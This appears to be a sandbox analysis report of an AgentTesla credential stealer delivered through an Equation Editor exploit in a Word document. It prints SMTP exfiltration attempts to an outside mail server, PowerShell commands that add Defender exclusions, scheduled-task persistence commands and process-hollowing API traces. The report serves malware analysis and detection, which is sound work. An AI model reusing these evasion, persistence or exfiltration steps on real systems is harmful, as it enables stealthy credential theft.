                                                                                      Apr 18, 2024 10:24:36.833693027 CEST58749172208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:36.833868027 CEST49172587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:36.986989975 CEST58749172208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:36.987303019 CEST49172587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:37.144119024 CEST58749172208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:38.299909115 CEST58749171208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:38.300168991 CEST49171587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:38.455454111 CEST58749171208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:38.455607891 CEST49171587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:38.625900984 CEST58749171208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:39.544198990 CEST58749172208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:39.544771910 CEST49172587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:39.700740099 CEST58749172208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:39.701014996 CEST49172587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:39.872864008 CEST58749172208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:40.107068062 CEST49169587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:40.107242107 CEST49170587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:40.261904001 CEST58749169208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:40.262182951 CEST58749170208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:40.580343962 CEST58749173208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:40.580518007 CEST49173587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:40.734402895 CEST58749173208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:40.734569073 CEST49173587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:44.890981913 CEST58749173208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:45.089590073 CEST49171587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:45.244359970 CEST58749171208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:46.301721096 CEST58749173208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:46.301999092 CEST49173587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:46.458444118 CEST58749173208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:46.458625078 CEST49173587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:46.532717943 CEST58749174208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:46.532891035 CEST49174587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:46.628889084 CEST58749173208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:46.686474085 CEST58749174208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:46.686775923 CEST49174587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:46.843734026 CEST58749174208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:47.931420088 CEST49172587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:48.085829020 CEST58749172208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:48.550048113 CEST58749174208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:48.550373077 CEST49174587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:48.705421925 CEST58749174208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:48.705573082 CEST49174587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:48.877095938 CEST58749174208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:49.126441002 CEST58749175208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:49.130379915 CEST49175587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:49.284199953 CEST58749175208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:49.284413099 CEST49175587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:49.441251040 CEST58749175208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:49.520809889 CEST58749176208.91.199.225192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:49.521007061 CEST49176587192.168.2.22208.91.199.225EHLO 216041
                                                                                      Apr 18, 2024 10:24:49.674693108 CEST58749176208.91.199.225192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:49.674873114 CEST49176587192.168.2.22208.91.199.225AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:49.832007885 CEST58749176208.91.199.225192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:51.550415039 CEST58749176208.91.199.225192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:51.550457954 CEST58749175208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:51.556792021 CEST49176587192.168.2.22208.91.199.225MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:51.556878090 CEST49175587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:51.712093115 CEST58749175208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:51.712389946 CEST49175587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:51.713795900 CEST58749176208.91.199.225192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:51.713893890 CEST49176587192.168.2.22208.91.199.225RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:51.884977102 CEST58749175208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:51.912970066 CEST58749176208.91.199.225192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:55.832062006 CEST49174587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:55.832112074 CEST49173587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:24:55.986268044 CEST58749173208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:55.986320019 CEST58749174208.91.198.143192.168.2.22221 2.0.0 Bye
                                                                                      Apr 18, 2024 10:24:56.303076982 CEST58749177208.91.198.143192.168.2.22220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                      Apr 18, 2024 10:24:56.303210020 CEST49177587192.168.2.22208.91.198.143EHLO 216041
                                                                                      Apr 18, 2024 10:24:56.457040071 CEST58749177208.91.198.143192.168.2.22250-us2.outbound.mailhostbox.com
                                                                                      250-PIPELINING
                                                                                      250-SIZE 41648128
                                                                                      250-VRFY
                                                                                      250-ETRN
                                                                                      250-STARTTLS
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-AUTH=PLAIN LOGIN
                                                                                      250-ENHANCEDSTATUSCODES
                                                                                      250-8BITMIME
                                                                                      250-DSN
                                                                                      250 CHUNKING
                                                                                      Apr 18, 2024 10:24:56.457195044 CEST49177587192.168.2.22208.91.198.143AUTH login b3JpZ2luQGZzaHB4bS5jb20=
                                                                                      Apr 18, 2024 10:24:56.614689112 CEST58749177208.91.198.143192.168.2.22334 UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:58.407046080 CEST58749177208.91.198.143192.168.2.22535 5.7.8 Error: authentication failed: UGFzc3dvcmQ6
                                                                                      Apr 18, 2024 10:24:58.419975042 CEST49177587192.168.2.22208.91.198.143MAIL FROM:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:58.576431036 CEST58749177208.91.198.143192.168.2.22250 2.1.0 Ok
                                                                                      Apr 18, 2024 10:24:58.576741934 CEST49177587192.168.2.22208.91.198.143RCPT TO:<origin@fshpxm.com>
                                                                                      Apr 18, 2024 10:24:58.748768091 CEST58749177208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:24:59.138678074 CEST58749177208.91.198.143192.168.2.22554 5.7.1 <origin@fshpxm.com>: Relay access denied
                                                                                      Apr 18, 2024 10:25:06.310566902 CEST49176587192.168.2.22208.91.199.225QUIT
                                                                                      Apr 18, 2024 10:25:06.310635090 CEST49175587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:06.798082113 CEST49175587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:06.828366041 CEST49176587192.168.2.22208.91.199.225QUIT
                                                                                      Apr 18, 2024 10:25:07.405602932 CEST49175587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:07.436676979 CEST49176587192.168.2.22208.91.199.225QUIT
                                                                                      Apr 18, 2024 10:25:08.600235939 CEST49175587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:08.637841940 CEST49176587192.168.2.22208.91.199.225QUIT
                                                                                      Apr 18, 2024 10:25:09.260175943 CEST49177587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:09.761081934 CEST49177587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:10.385067940 CEST49177587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:11.005409002 CEST49175587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:11.040388107 CEST49176587192.168.2.22208.91.199.225QUIT
                                                                                      Apr 18, 2024 10:25:11.633100033 CEST49177587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:14.113569021 CEST49177587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:15.798372030 CEST49175587192.168.2.22208.91.198.143QUIT
                                                                                      Apr 18, 2024 10:25:15.845112085 CEST49176587192.168.2.22208.91.199.225QUIT
                                                                                      Apr 18, 2024 10:25:19.074539900 CEST49177587192.168.2.22208.91.198.143QUIT

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:10:23:50
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                      Imagebase:0x13f550000
                                                                                      File size:1'423'704 bytes
                                                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:10:23:50
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543'304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:10:23:55
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\dzoihohj75439.scr
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                                                                                      Imagebase:0xa50000
                                                                                      File size:722'440 bytes
                                                                                      MD5 hash:60E4F25FA64A0EF31AC57663A26DA790
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.361580935.00000000033DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 71%, ReversingLabs
                                                                                      • Detection: 63%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:10:23:55
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                                                                                      Imagebase:0x12b0000
                                                                                      File size:427'008 bytes
                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:10:23:56
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                                                                                      Imagebase:0x12b0000
                                                                                      File size:427'008 bytes
                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:10:23:56
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp"
                                                                                      Imagebase:0x700000
                                                                                      File size:179'712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:10:23:58
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\dzoihohj75439.scr
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                                                                                      Imagebase:0xa50000
                                                                                      File size:722'440 bytes
                                                                                      MD5 hash:60E4F25FA64A0EF31AC57663A26DA790
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:10:23:58
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\dzoihohj75439.scr
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                                                                                      Imagebase:0xa50000
                                                                                      File size:722'440 bytes
                                                                                      MD5 hash:60E4F25FA64A0EF31AC57663A26DA790
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.718122401.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.718610223.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:10:23:58
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Windows\System32\taskeng.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:taskeng.exe {E15E873E-836C-4FC1-A12D-690BEBE78D2E} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                      Imagebase:0xff6a0000
                                                                                      File size:464'384 bytes
                                                                                      MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:10:23:58
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\egFUHsL.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\egFUHsL.exe
                                                                                      Imagebase:0xe90000
                                                                                      File size:722'440 bytes
                                                                                      MD5 hash:60E4F25FA64A0EF31AC57663A26DA790
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 71%, ReversingLabs
                                                                                      • Detection: 63%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:10:24:00
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                                                                                      Imagebase:0x12f0000
                                                                                      File size:427'008 bytes
                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:10:24:00
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                                                                                      Imagebase:0x12f0000
                                                                                      File size:427'008 bytes
                                                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:10:24:02
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp9A3D.tmp"
                                                                                      Imagebase:0x4f0000
                                                                                      File size:179'712 bytes
                                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:22
                                                                                      Start time:10:24:04
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\egFUHsL.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\egFUHsL.exe"
                                                                                      Imagebase:0xe90000
                                                                                      File size:722'440 bytes
                                                                                      MD5 hash:60E4F25FA64A0EF31AC57663A26DA790
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000016.00000002.718596214.0000000002351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:23
                                                                                      Start time:10:24:17
                                                                                      Start date:18/04/2024
                                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                      Imagebase:0x400000
                                                                                      File size:543'304 bytes
                                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:17.7%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:104
                                                                                        Total number of Limit Nodes:4
                                                                                        execution_graph 14096 9f6bba 14101 9f923e 14096->14101 14116 9f91c8 14096->14116 14130 9f91d8 14096->14130 14097 9f6b99 14102 9f91cc 14101->14102 14103 9f9241 14101->14103 14104 9f91fa 14102->14104 14144 9fa084 14102->14144 14148 9f9c58 14102->14148 14153 9f9969 14102->14153 14157 9f9cf9 14102->14157 14162 9f9b5c 14102->14162 14167 9f985d 14102->14167 14172 9f984e 14102->14172 14177 9f979e 14102->14177 14184 9f95e1 14102->14184 14188 9f9602 14102->14188 14192 9f9743 14102->14192 14103->14097 14104->14097 14117 9f91cc 14116->14117 14118 9f979e 3 API calls 14117->14118 14119 9f984e 2 API calls 14117->14119 14120 9f985d 2 API calls 14117->14120 14121 9f9b5c 2 API calls 14117->14121 14122 9f9cf9 2 API calls 14117->14122 14123 9f9969 2 API calls 14117->14123 14124 9f9c58 2 API calls 14117->14124 14125 9fa084 2 API calls 14117->14125 14126 9f9743 2 API calls 14117->14126 14127 9f9602 CreateProcessA 14117->14127 14128 9f95e1 CreateProcessA 14117->14128 14129 9f91fa 14117->14129 14118->14129 14119->14129 14120->14129 14121->14129 14122->14129 14123->14129 14124->14129 14125->14129 14126->14129 14127->14129 14128->14129 14129->14097 14131 9f91f2 14130->14131 14132 9f91fa 14131->14132 14133 9f979e 3 API calls 14131->14133 14134 9f984e 2 API calls 14131->14134 14135 9f985d 2 API calls 14131->14135 14136 9f9b5c 2 API calls 14131->14136 14137 9f9cf9 2 API calls 14131->14137 14138 9f9969 2 API calls 14131->14138 14139 9f9c58 2 API calls 14131->14139 14140 9fa084 2 API calls 14131->14140 14141 9f9743 2 API calls 14131->14141 14142 9f9602 CreateProcessA 14131->14142 14143 9f95e1 CreateProcessA 14131->14143 14132->14097 14133->14132 14134->14132 14135->14132 14136->14132 14137->14132 14138->14132 14139->14132 14140->14132 14141->14132 14142->14132 14143->14132 14198 9f61d8 14144->14198 14202 9f61e0 14144->14202 14145 9fa0ab 14151 9f61d8 WriteProcessMemory 14148->14151 14152 9f61e0 WriteProcessMemory 14148->14152 14149 9f9737 14149->14148 14150 9f9749 14149->14150 14150->14104 14151->14149 14152->14149 14206 9f5f88 14153->14206 14210 9f5f84 14153->14210 14154 9f9986 14158 9f9737 14157->14158 14159 9f9749 14158->14159 14160 9f61d8 WriteProcessMemory 14158->14160 14161 9f61e0 WriteProcessMemory 14158->14161 14159->14104 14160->14158 14161->14158 14163 9f9878 14162->14163 14164 9f9890 14163->14164 14214 9f5e98 14163->14214 14218 9f5e93 14163->14218 14164->14104 14168 9f9867 14167->14168 14170 9f5e98 ResumeThread 14168->14170 14171 9f5e93 ResumeThread 14168->14171 14169 9f9890 14169->14104 14170->14169 14171->14169 14173 9f9efb 14172->14173 14175 9f61d8 WriteProcessMemory 14173->14175 14176 9f61e0 WriteProcessMemory 14173->14176 14174 9f99df 14174->14104 14175->14174 14176->14174 14222 9f60b8 14177->14222 14178 9f9ede 14178->14104 14180 9f99df 14180->14104 14181 9f61d8 WriteProcessMemory 14181->14180 14182 9f61e0 WriteProcessMemory 14182->14180 14185 9f95ed 14184->14185 14226 9f6578 14185->14226 14189 9f95ed 14188->14189 14191 9f6578 CreateProcessA 14189->14191 14190 9f9712 